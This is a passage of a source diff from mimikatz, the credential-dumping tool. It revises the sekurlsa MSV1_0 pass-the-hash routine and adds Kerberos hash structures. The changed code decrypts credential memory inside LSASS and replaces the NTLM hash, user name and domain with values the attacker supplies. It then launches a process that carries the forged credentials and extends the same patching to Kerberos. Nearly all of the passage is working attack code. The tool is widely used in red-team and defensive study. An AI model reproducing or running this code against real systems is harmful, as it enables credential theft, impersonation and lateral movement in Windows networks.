flags |= KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY;
else if(RtlEqualString(&pCredentials->Primary, &CREDENTIALKEYS_STRING, FALSE))
flags |= KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY;
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) &pCredentials->Credentials, stdData->LogonId, flags);
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) &pCredentials->Credentials, (PLUID) pOptionalData, flags);
return TRUE;
}
@ -45,17 +42,21 @@ BOOL CALLBACK kuhl_m_sekurlsa_msv_enum_cred_callback_pth(IN PKIWI_MSV1_0_PRIMARY
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_MEMORY_ADDRESS aLocalMemory = {pPrimaryCreds, &hLocalMemory};
(*pthDataCred->pSecData->lsassLocalHelper->pLsaUnprotectMemory)(pPrimaryCreds, pCredentials->Credentials.Length);
RtlZeroMemory(pPrimaryCreds->LmOwfPassword, LM_NTLM_HASH_LENGTH);
RtlCopyMemory(pPrimaryCreds->NtOwfPassword, pthDataCred->pthData->NtlmHash, LM_NTLM_HASH_LENGTH);
RtlCopyMemory((PBYTE) pPrimaryCreds + (ULONG_PTR) pPrimaryCreds->UserName.Buffer, pthDataCred->pthData->UserName, pPrimaryCreds->UserName.Length);
RtlCopyMemory((PBYTE) pPrimaryCreds + (ULONG_PTR) pPrimaryCreds->LogonDomainName.Buffer, pthDataCred->pthData->LogonDomain, pPrimaryCreds->LogonDomainName.Length);
(*pthDataCred->pSecData->lsassLocalHelper->pLsaProtectMemory)(pPrimaryCreds, pCredentials->Credentials.Length);
if(RtlEqualString(&pCredentials->Primary, &PRIMARY_STRING, FALSE))
{
(*pthDataCred->pSecData->lsassLocalHelper->pLsaUnprotectMemory)(pPrimaryCreds, pCredentials->Credentials.Length);
RtlZeroMemory(pPrimaryCreds->LmOwfPassword, LM_NTLM_HASH_LENGTH);
RtlCopyMemory(pPrimaryCreds->NtOwfPassword, pthDataCred->pthData->NtlmHash, LM_NTLM_HASH_LENGTH);
RtlCopyMemory((PBYTE) pPrimaryCreds + (ULONG_PTR) pPrimaryCreds->UserName.Buffer, pthDataCred->pthData->UserName, pPrimaryCreds->UserName.Length);
RtlCopyMemory((PBYTE) pPrimaryCreds + (ULONG_PTR) pPrimaryCreds->LogonDomainName.Buffer, pthDataCred->pthData->LogonDomain, pPrimaryCreds->LogonDomainName.Length);
(*pthDataCred->pSecData->lsassLocalHelper->pLsaProtectMemory)(pPrimaryCreds, pCredentials->Credentials.Length);
kprintf(L"Data copy @ %p : ", origBufferAddress->address);
if(pthDataCred->pthData->isReplaceOk = kull_m_memory_copy(origBufferAddress, &aLocalMemory, pCredentials->Credentials.Length))
kprintf(L"OK !\n");
else PRINT_ERROR_AUTO(L"kull_m_memory_copy");
kprintf(L"Data copy @ %p : ", origBufferAddress->address);
if(pthDataCred->pthData->isReplaceOk = kull_m_memory_copy(origBufferAddress, &aLocalMemory, pCredentials->Credentials.Length))
kprintf(L"OK !");
else PRINT_ERROR_AUTO(L"kull_m_memory_copy");
}
else kprintf(L".");
return TRUE;
}
@ -78,14 +79,14 @@ NTSTATUS kuhl_m_sekurlsa_msv_pth(int argc, wchar_t * argv[])
BYTE ntlm[LM_NTLM_HASH_LENGTH] = {0};
TOKEN_STATISTICS tokenStats;
MSV1_0_PTH_DATA data = {&(tokenStats.AuthenticationId), NULL, NULL, ntlm, FALSE};
PCWCHAR szRun, szNTLM, pFakeUserName, pFakeLogonDomain;
PCWCHAR szRun, szNTLM;
DWORD i, j, dwNeededSize;
HANDLE hToken;
PROCESS_INFORMATION processInfos;
if(pFakeUserName = kuhl_m_sekurlsa_msv_pth_makefakestring(argc, argv, L"user", &data.UserName))
if(kull_m_string_args_byName(argc, argv, L"user", &data.UserName, NULL))
{
if(pFakeLogonDomain = kuhl_m_sekurlsa_msv_pth_makefakestring(argc, argv, L"domain", &data.LogonDomain))
if(kull_m_string_args_byName(argc, argv, L"domain", &data.LogonDomain, NULL))
{
if(kull_m_string_args_byName(argc, argv, L"ntlm", &szNTLM, NULL))
{
@ -99,7 +100,7 @@ NTSTATUS kuhl_m_sekurlsa_msv_pth(int argc, wchar_t * argv[])
}
kprintf(L"NTLM\t: "); kull_m_string_wprintf_hex(data.NtlmHash, LM_NTLM_HASH_LENGTH, 0); kprintf(L"\n");
kprintf(L"Program\t: %s\n", szRun);
if(kull_m_process_create(KULL_M_PROCESS_CREATE_LOGON, szRun, CREATE_SUSPENDED, NULL, LOGON_NETCREDENTIALS_ONLY, pFakeUserName, pFakeLogonDomain, L"", &processInfos, FALSE))
if(kull_m_process_create(KULL_M_PROCESS_CREATE_LOGON, szRun, CREATE_SUSPENDED, NULL, LOGON_NETCREDENTIALS_ONLY, data.UserName, data.LogonDomain, L"", &processInfos, FALSE))
{
kprintf(
L" | PID %u\n"
@ -112,36 +113,32 @@ NTSTATUS kuhl_m_sekurlsa_msv_pth(int argc, wchar_t * argv[])
kprintf(L" | LUID %u ; %u (%08x:%08x)\n", tokenStats.AuthenticationId.HighPart, tokenStats.AuthenticationId.LowPart, tokenStats.AuthenticationId.HighPart, tokenStats.AuthenticationId.LowPart);
kprintf(L" \\_ ");
kuhl_m_sekurlsa_enum(kuhl_m_sekurlsa_enum_callback_msv_pth, &data);
kprintf(L"\n");
if(data.isReplaceOk)
{
kprintf(L" \\_ ");
kuhl_m_sekurlsa_enum(kuhl_m_sekurlsa_enum_callback_kerberos_pth, &data);
kprintf(L"\n");
}
} else PRINT_ERROR_AUTO(L"GetTokenInformation");
CloseHandle(hToken);
} else PRINT_ERROR_AUTO(L"OpenProcessToken");
NtResumeProcess(processInfos.hProcess);
if(data.isReplaceOk)
NtResumeProcess(processInfos.hProcess);
else
NtTerminateProcess(processInfos.hProcess, STATUS_FATAL_APP_EXIT);
CloseHandle(processInfos.hThread);
CloseHandle(processInfos.hProcess);
} else PRINT_ERROR_AUTO(L"CreateProcessWithLogonW");
} else PRINT_ERROR(L"ntlm hash length must be 32 (16 bytes)\n");
} else PRINT_ERROR(L"Missing argument : ntlm\n");
LocalFree((HLOCAL) pFakeLogonDomain);
}
LocalFree((HLOCAL) pFakeUserName);
}
return STATUS_SUCCESS;
}
PWCHAR kuhl_m_sekurlsa_msv_pth_makefakestring(const int argc, const wchar_t * argv[], const wchar_t * name, const wchar_t ** theArgs)
{
PWCHAR ret = NULL;
SIZE_T len;
if(kull_m_string_args_byName(argc, argv, name, theArgs, NULL))
{
kprintf(L"%s\t: %s\n", name, *theArgs);
len = wcslen(*theArgs);
if(ret = (PWCHAR) LocalAlloc(LPTR, (len + 1) * sizeof(wchar_t)))
wmemset(ret, L'-', len);
} else PRINT_ERROR(L"Missing argument : %s\n", name);
return ret;
}
VOID kuhl_m_sekurlsa_msv_enum_cred(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PVOID pCredentials, IN PKUHL_M_SEKURLSA_MSV_CRED_CALLBACK credCallback, IN PVOID optionalData)
{
KIWI_MSV1_0_CREDENTIALS credentials;

4
mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_msv1_0.h
View File

@ -62,6 +62,4 @@ BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_msv_pth(IN PKIWI_BASIC_SECURITY_LOGO
VOID kuhl_m_sekurlsa_msv_enum_cred(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PVOID pCredentials, IN PKUHL_M_SEKURLSA_MSV_CRED_CALLBACK credCallback, IN PVOID optionalData);
BOOL CALLBACK kuhl_m_sekurlsa_msv_enum_cred_callback_std(IN struct _KIWI_MSV1_0_PRIMARY_CREDENTIALS * pCredentials, IN DWORD AuthenticationPackageId, IN PKULL_M_MEMORY_ADDRESS origBufferAddress, IN OPTIONAL LPVOID pOptionalData);
BOOL CALLBACK kuhl_m_sekurlsa_msv_enum_cred_callback_pth(IN struct _KIWI_MSV1_0_PRIMARY_CREDENTIALS * pCredentials, IN DWORD AuthenticationPackageId, IN PKULL_M_MEMORY_ADDRESS origBufferAddress, IN OPTIONAL LPVOID pOptionalData);
PWCHAR kuhl_m_sekurlsa_msv_pth_makefakestring(const int argc, const wchar_t * argv[], const wchar_t * name, const wchar_t ** theArgs);
BOOL CALLBACK kuhl_m_sekurlsa_msv_enum_cred_callback_pth(IN struct _KIWI_MSV1_0_PRIMARY_CREDENTIALS * pCredentials, IN DWORD AuthenticationPackageId, IN PKULL_M_MEMORY_ADDRESS origBufferAddress, IN OPTIONAL LPVOID pOptionalData);

17
modules/kull_m_crypto_system.h
View File

@ -148,6 +148,23 @@ typedef struct _KERB_CHECKSUM {
PVOID unk0_null;
} KERB_CHECKSUM, *PKERB_CHECKSUM;
typedef struct _KERB_HASHPASSWORD_GENERIC {
DWORD Type;
SIZE_T Size;
PBYTE Checksump;
} KERB_HASHPASSWORD_GENERIC, *PKERB_HASHPASSWORD_GENERIC;
typedef struct _KERB_HASHPASSWORD_5 {
LSA_UNICODE_STRING salt; // http://tools.ietf.org/html/rfc3962
KERB_HASHPASSWORD_GENERIC generic;
} KERB_HASHPASSWORD_5, *PKERB_HASHPASSWORD_5;
typedef struct _KERB_HASHPASSWORD_6 {
LSA_UNICODE_STRING salt; // http://tools.ietf.org/html/rfc3962
PVOID stringToKey;
KERB_HASHPASSWORD_GENERIC generic;
} KERB_HASHPASSWORD_6, *PKERB_HASHPASSWORD_6;
typedef NTSTATUS (WINAPI * PKERB_ECRYPT_INITIALIZE) (LPCVOID Key, DWORD KeySize, DWORD KeyUsage, PVOID * pContext);
typedef NTSTATUS (WINAPI * PKERB_ECRYPT_ENCRYPT) (PVOID pContext, LPCVOID Data, DWORD DataSize, PVOID Output, DWORD * OutputSize);
typedef NTSTATUS (WINAPI * PKERB_ECRYPT_DECRYPT) (PVOID pContext, LPCVOID Data, DWORD DataSize, PVOID Output, DWORD * OutputSize);

2
modules/kull_m_patch.c
View File

@ -73,7 +73,7 @@ PKULL_M_PATCH_GENERIC kull_m_patch_getGenericFromBuild(PKULL_M_PATCH_GENERIC gen
return current;
}
BOOL kull_m_patch_genericProcessOrServiceFromBuild(PKULL_M_PATCH_GENERIC generics, SIZE_T cbGenerics, PCWSTR processOrService, PCWSTR moduleName, BOOL isService) // to do for process
BOOL kull_m_patch_genericProcessOrServiceFromBuild(PKULL_M_PATCH_GENERIC generics, SIZE_T cbGenerics, PCWSTR processOrService, PCWSTR moduleName, BOOL isService) // to do for process // to do callback ! (vault & lsadump)
{
BOOL result = FALSE;
SERVICE_STATUS_PROCESS ServiceStatusProcess;